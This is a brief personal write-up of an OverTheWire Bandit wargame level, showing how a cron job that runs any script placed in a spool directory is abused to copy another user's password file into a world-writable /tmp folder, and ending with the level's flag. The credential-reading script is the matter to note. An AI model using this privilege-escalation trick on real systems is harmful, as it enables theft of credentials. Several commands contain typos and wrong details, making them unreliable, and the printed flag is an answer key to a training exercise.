# overthewire writeup
Zachery Lorch

### Leve23->level24
1. connect to server using ssh protcol

```bash
ssh bandit21@bandit.labs.overthewire.ord -p 2220
```
2. entering in the password *pervious flag*

3. go to the folder they said 

```bash 
cat /etc/cron.d
```
4. I open the .sh that is made and read what it is doing. 

```bash
cat /usr/bin/cronjob_bandit24.sh
```

5. so we can see that this script is exiecuting anything .sh writting
in /var/spool/bandit24 this is good for us 

6. we create a folder in tmp to work with and give it all privledges

```bash 
mkdir /tmp/dummy
chmod 777 /tmp/dummy
```

7. then I mimiced the .sh from challenge 23 here is my .sh script
#!/bin/bash
cat /etc/bandit_pss/bandit24 > /tmp/dummy/file

8. this script will exicute every 60 seconds so I wait and then read file
	

flag: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ